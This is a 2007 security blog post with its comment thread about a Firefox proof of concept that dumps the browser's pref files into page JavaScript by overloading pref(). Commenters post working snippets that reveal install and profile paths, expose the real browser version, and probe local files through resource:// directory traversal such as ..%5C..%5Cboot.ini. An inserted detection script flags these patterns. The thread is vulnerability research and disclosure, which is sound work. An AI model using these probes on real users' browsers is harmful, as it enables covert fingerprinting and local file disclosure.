Read Firefox Settings (PoC)
Sergey Vzloman sent me a really interesting proof of concept this morning on how you can read Firefox settings. It dumps all the browser settings into JavaScript space. Here’s the PoC code:
<script>
// Firefox pref files are plain JavaScript made of pref(name, value) calls;
// defining pref() first means every call from the included file lands here.
function pref(param,value){
document.write ("<b>"+param+"</b> = "+value+"")
};
</script>
<script src="resource://gre/greprefs/security-prefs.js"></script>
<script src="resource://gre/greprefs/all.js"></script>
So as you probably would have expected, I did add it to Mr. T (click for an example in Firefox) so that it would be included as well when you’re in the process of doing recon. Very cool, and obviously can be used to know in very fine detail what the user is using and what specialized security settings they may have installed. Tricky. Thanks to Sergey for the code!
May 16th, 2007 at 8:54 am
You can also add:
for the XPInstall settings.
May 16th, 2007 at 9:22 am
Sorry, Aviv, you must change < to &lt; to get it to go through. I was interested in your comment though.
May 16th, 2007 at 10:06 am
That comment reminds me of a wonderful PoC I have against any browser. The following javascript will locally execute code on any browser that sees it, and can even bypass NoScript! If you’re reading this, it’s already too late:
Ok, I’m kidding. Was I the only one reminded of Fermat’s last theorem when they read that comment as it is now? “I have a truly marvelous proof which unfortunately cannot bypass the site’s filters.”
I’m such a dork.
May 16th, 2007 at 10:38 am
Since when was there a digg button? (/diggs)
Anyways, this is great. Really adds to the recon a person can do.
May 16th, 2007 at 10:39 am
I wonder why the resource:// is limited to those two folders, anyone an idea?
May 16th, 2007 at 10:46 am
I tried the Mr. T URL on Internet Explorer to see what it would do, if anything, and it has crashed that window of IE. It is unresponsive to all input, including right-clicking the taskbar for that window.
I’d try it on Firefox but can’t be bothered to install it as I’m at college :\
May 16th, 2007 at 10:54 am
Yeah, so back to actually contributing. I think what Aviv was pointing out is use the same pref overloading function and access xpinstall.js:
resource://gre/greprefs/xpinstall.js
Also — it’s possible to hijack new variable creation isn’t it? I never did get it working when playing with it a while back, but I seem to recall it being doable. If so, might also go after browserconfig.properties if there’s ever anything useful there.
resource://gre/browserconfig.properties
May 16th, 2007 at 11:44 am
kyran - id bugged me about it for long enough I finally added it. I hope it’s not too annoying.
Ronald - no clue! Probably a security measure, but I’m pretty sure knowing all that information is a security issue in and of itself anyway.
Tribute - any idea which version of IE you were using and on what OS? Any special plugins?
May 16th, 2007 at 12:39 pm
This just dumps out the default settings, not the user’s current settings. You could get the default settings just as easily by grabbing those files from ftp.mozilla.org.
May 16th, 2007 at 12:47 pm
Ugh, you’re right. I just changed keyword.URL in about:config to http://search.yahoo.com/search?ei=UTF-8&fr=sfp&fspl=1&p= (since I prefer Yahoo’s search anyway) and sure enough it didn’t change. :-/ Is there any value in knowing the default? Does it change in any interesting way from version to version that’s worth looking at? Time to take it out of Mr. T.
May 16th, 2007 at 1:18 pm
Ronald– resource: is used by Mozilla code to load local install files without invoking the “chrome” system. Some mozilla embedding environments use the browser engine but don’t need or want XUL. It only reads from the install location because that’s all it needs to do; there’s no point in letting it walk around your disk if it doesn’t need to.
RSnake– this should only get you the default settings, which for 99.99% of people are going to be the untouched defaults that ship with the browser. Maybe a few corporate deployments will install altered defaults, and you could pick those up this way, but you won’t read actual user settings.
May 16th, 2007 at 1:32 pm
I tried it (from the Mr. T link) with IE7 on WinXP.
The output doesn’t really seem to be interesting; the browser didn’t crash though.
The first page load rendered “IE7.0 not detected”. (A refresh detected IE7 correctly.)
It also detected IE as the default browser, which it isn’t.
Interesting, isn’t it!
May 16th, 2007 at 2:07 pm
Dan - thanks, got it
Bipin- I removed it from Mr T, so that output is no longer there.
May 16th, 2007 at 2:36 pm
One thing useful (?) you can grab is the directory where FF is installed:
<LINK REL="stylesheet" href="resource://gre/" type="text/css" id="x" />
<script>
alert(document.getElementById("x").sheet.href);
</script>
May 16th, 2007 at 3:15 pm
I was playing around with the various Firefox URIs a while back (including resource)… you can actually traverse back up the local file system by using a “%5c” (ex: resource:///..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini). I actually had a POC that enumerated software from a user’s local filesystem using the Resource URI and the %5c traversals.
IE has a similar problem (although slightly more complicated). I let MS know and they’ll be fixing it soon, but I guess the FF Resource URI is out of the bag!
BK
May 16th, 2007 at 3:45 pm
Awesome finding, BK!
Can you explain how you enumerated the files?
As far as I know, you will need to use the resource URI in a readable object. Which one did you use?
Back to the pref function. Another useful piece of info is the real User Agent/current FF version:
<script>
function pref(param,value){
if (param=="general.useragent.extra.firefox") {
alert("Your real FF version is: "+value)
}
};
</script>
<script src="resource://gre/defaults/pref/firefox.js"></script>
This will bypass the “User Agent Switcher” add-on.
May 16th, 2007 at 4:04 pm
Anyone think of making a Firekeeper rule to detect this?
May 16th, 2007 at 6:09 pm
Aviv - Keep in mind that the Resource URI isn’t limited to .js files. It can be used to load other files as well. I simply used the resource URI to load javascript objects from the local file system. A simple example of this is using a javascript img object:
var probe = new Image(); // "enum" is a reserved word in JavaScript, so the object is named probe here
probe.src = "resource:///..%5C..%5C..%5Cpath-to-software%5Cknown-image-file";
from here.. I simply checked to see if the js object was loaded or not. I actually had a small DB of known files associated with various pieces of software that could be loaded into js objects. In some cases, you could actually determine the version of software installed.
Another dangerous item related to Resource, is you can actually control some of the contents in the first line of a Resource response. For example, if you use the dir traversal, you can actually place your content into the initial line.
ex: resource:///..%5C..%5CYOUR-CONTENT-HERE%5C..%5C
I was attempting to find the right mix of characters that could initiate a UXSS in the context of “resource” but I was unable to… maybe one of you can figure it out!
BK
May 16th, 2007 at 8:50 pm
This will give you the path of your current profile in Windows. Now you can regex the username from e.g. C:\documents and settings\bla\desktop\…..
Works only locally so far.
<LINK REL="stylesheet" href="res%6Furce://..%5C" type="text/css" id="path">
<script>
alert(document.getElementById("path").sheet.href);
</script>
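Answering the earlier question about a Firekeeper rule: the following is an added example, not code from this thread or from Firekeeper, that scans page content for the three resource:// patterns shown above (prefs-file script includes, ..%5C traversal, and the res%6Furce percent-encoding trick). The sample HTML it runs on is constructed for the example.

```javascript
// Added example (not Firekeeper or thread code): flag resource:// usage in page
// content the way a content-filter rule would. Input is raw HTML; output is a
// list of findings. The patterns are the ones discussed in this thread.

// Decode %XX escapes until stable, then lowercase, so "res%6Furce://..%5C"
// compares as "resource://..\" (the backslash form the traversal relies on).
function normaliseUrl(raw) {
  let out = raw, prev;
  do {
    prev = out;
    try { out = decodeURIComponent(out); } catch (e) { break; } // malformed %-escape: stop
  } while (out !== prev);
  return out.toLowerCase();
}

// Classify one URL-ish string; null means "not a resource: URI".
function classifyUrl(raw) {
  const u = normaliseUrl(raw);
  if (!u.startsWith('resource:')) return null;
  if (/\.\.[\\\/]/.test(u)) return 'resource-traversal';   // ..\ or ../ inside the URI
  if (/\/greprefs\/|\/defaults\/pref\//.test(u)) return 'resource-prefs-dump'; // pref() overloading target
  return 'resource-uri';                                   // e.g. install-dir disclosure via <link>
}

// src=/href= attributes (quoted or bare) and JS string literals, in document order.
const ATTR_URL = /\b(?:src|href)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
const STRING_LITERAL = /["']([^"'\n]{1,512})["']/g;

function scanHtml(html) {
  const findings = [];
  const seen = new Set();
  const record = (url) => {
    const kind = classifyUrl(url);
    if (kind && !seen.has(url)) { seen.add(url); findings.push({ kind, url }); }
  };
  for (const m of html.matchAll(ATTR_URL)) record(m[1] || m[2] || m[3] || '');
  for (const m of html.matchAll(STRING_LITERAL)) record(m[1]);
  return findings;
}

// Constructed sample page: the thread's PoCs plus one benign remote include.
const SAMPLE_HTML = [
  '<script src="resource://gre/greprefs/all.js"></script>',
  '<link rel="stylesheet" href="res%6Furce://..%5C" type="text/css" id="path">',
  '<script>var p = new Image(); p.src = "resource:///..%5C..%5Cboot.ini";</script>',
  '<script src="https://example.com/app.js"></script>',
].join('\n');

console.log(scanHtml(SAMPLE_HTML)); // three findings; the https include is ignored
```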
May 17th, 2007 at 1:09 am
Can somebody find any bug in this site:
http://forum.antichat.ru/
May 17th, 2007 at 1:43 am
I tested the resource URI as a SCRIPT source for reading local files. Thanks to BK! My job is done.
May 17th, 2007 at 2:37 am
How to get data, for example, from:
resource:///..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
resource:///..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CProgram%20Files%5Cdesktop.ini
…
?
May 17th, 2007 at 3:20 am
@Dan Veditz
Thanks for explaining, it seems that this all.js file is just a default install. I had a look at it, but I can’t find any juicy information. It shows that JavaScript is enabled, for instance, but that would fail if I have NoScript installed. Same with the locales, which can be changed with extensions, so my fair guess is it would generate a lot of false positives. And most of them are pretty standard, like whitelisting only addons.mozilla.org for extensions.
Cool hack though, if anyone can make it remotely really read other local files or Firefox session & cookie files, I’d be glad to hear.
May 17th, 2007 at 4:10 am
This example can be used to know installed extensions:
Search plugins: (like google.xml, yandex.xml, wikipedia-ru.xml)
c:\Program Files\Mozilla Firefox\searchplugins\google.xml
Installed dictionaries:
c:\..\dictionaries\ru.aff
c:\..\dictionaries\en.aff
Extension Plugins:
plugins\flashplayer.xpt
plugins\NPJava32.dll
plugins\QuickTimePlugin.class
plugins\ShockwavePlugin.class
May 17th, 2007 at 12:17 pm
Enjoy resource:///..%5C while you can — it will soon stop working
https://bugzilla.mozilla.org/show_bug.cgi?id=367428
(test builds of 2.0.0.4 and 1.5.0.12 release candidates available at ftp.mozilla.org in the Firefox “nightly” directory)
May 17th, 2007 at 1:50 pm
RSnake- I was running IE6 on Win Server 2003. No plugins.
I tried it at home on IE6 with XP and it’s fine. So not sure what the crash was about. I’ll try it again next week in college if I remember.
May 18th, 2007 at 4:03 am
@Dan Veditz
To my knowledge: resource:///..%5C only works locally, not remotely. Correct me if I’m wrong.
May 18th, 2007 at 4:39 am
Nope, doesn’t work. Error console gives this:
Security Error: Content at http://ha.ckers.org/blog/20070516/read-firefox-settings-poc/#comments may not load or link to resource:///..%5C.
May 24th, 2007 at 9:18 pm
Even if the directory traversal vulnerability here is fixed we can still read any file from inside the Firefox install directory. This includes update.xml, install.log or even browserconfig.properties - the latter of which contains your homepage settings.
http://larholm.com/2007/05/25/firefox-0day-local-file-reading/
June 1st, 2007 at 2:08 am
Hi there,
Guess there is no way to find out the user’s profile directory, is there?
That would be a real security flaw…
BTW: what about background AJAX file uploads? If you know/guess the location of specific files you can upload them to your server, and your visitors won’t recognize it. Is there anything you can do to protect yourself from such an “attack”?
-ebook searchr
June 1st, 2007 at 4:46 am
Is it possible to steal cookies using an AJAX background file upload?
I sketched a possible attack here (http://mobdev.tknerr.de/2007/06/01/cookie-stealing-using-ajax-backgound-file-upload/)
I am sure this must have been discussed already, but IMHO this is still a big issue. I would be glad to hear your comments on whether the sketched attack is indeed so easily possible.
-ukio
August 25th, 2007 at 1:03 pm
Great way to see FF plugins
Do you think we can get what add-ons are installed for IE?
Perhaps we can see if IE responds to certain file types that add-ons interact with, and by that know what add-ons are installed, for example Flash (.swf)?
What do you think ?
August 24th, 2009 at 10:36 pm
It’s pretty easy to produce; I have coded my own script out of your method and it’s very useful.